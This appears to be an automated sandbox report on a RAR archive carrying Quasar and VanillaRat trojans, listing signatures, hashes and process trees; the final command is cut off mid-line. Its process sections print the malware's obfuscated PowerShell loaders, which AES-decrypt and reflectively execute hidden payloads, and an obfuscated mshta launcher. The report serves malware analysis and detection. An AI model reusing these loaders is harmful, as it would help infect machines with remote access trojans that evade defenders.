Malware Analysis Report

2024-10-19 08:13

Sample ID 240818-qv2s2aydjj
Target Password_Is_MadeByBKA.rar
SHA256 6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa
Tags
defense_evasion quasar v2.2.5 | vanillarat discovery spyware trojan execution rat vanillarat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6d886767f487cd0bc1ee29c899540e2ccfe6f1d3253ea629acd8d397a0a84faa

Threat Level: Known bad

The file Password_Is_MadeByBKA.rar was found to be: Known bad.

Malicious Activity Summary

defense_evasion quasar v2.2.5 | vanillarat discovery spyware trojan execution rat vanillarat

Suspicious use of NtCreateUserProcessOtherParentProcess

Vanilla Rat payload

Quasar payload

Suspicious use of NtCreateProcessExOtherParentProcess

Quasar RAT

Vanillarat family

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Checks BIOS information in registry

Indicator Removal: Clear Windows Event Logs

Deletes itself

Executes dropped EXE

Hide Artifacts: Hidden Window

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Modifies registry class

Checks SCSI registry key(s)

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-18 13:35

Signatures

Vanilla Rat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Vanillarat family

vanillarat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win7-20240729-en

Max time kernel

18s

Max time network

18s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/2372-5-0x000007FEF636E000-0x000007FEF636F000-memory.dmp

memory/2372-6-0x000000001B450000-0x000000001B732000-memory.dmp

memory/2372-7-0x0000000002830000-0x0000000002838000-memory.dmp

memory/2372-8-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

memory/2372-9-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

memory/2372-10-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

memory/2372-11-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-18 13:35

Reported

2024-08-18 13:37

Platform

win10-20240404-en

Max time kernel

60s

Max time network

19s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2284 created 592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\system32\winlogon.exe
PID 2284 created 592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\system32\winlogon.exe

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-mshta.exe N/A
N/A N/A C:\Windows\$sxr-cmd.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\$sxr-powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Windows\$sxr-powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\$sxr-powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 2796 wrote to memory of 2284 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4736 wrote to memory of 4148 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4736 wrote to memory of 4148 N/A C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-cmd.exe
PID 4148 wrote to memory of 2252 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 4148 wrote to memory of 2252 N/A C:\Windows\$sxr-cmd.exe C:\Windows\$sxr-powershell.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\System32\dllhost.exe
PID 2284 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1452 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2284 wrote to memory of 1592 N/A C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe C:\Windows\SysWOW64\dllhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"

C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe

"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{23c621aa-c62a-4f76-a3f3-8649b062a849}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e83bb8f9-a68a-4d3d-86e9-ad9c86c68f3f}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = 